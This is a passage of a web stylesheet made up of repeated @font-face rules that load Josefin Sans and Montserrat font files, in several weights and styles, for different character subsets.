U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 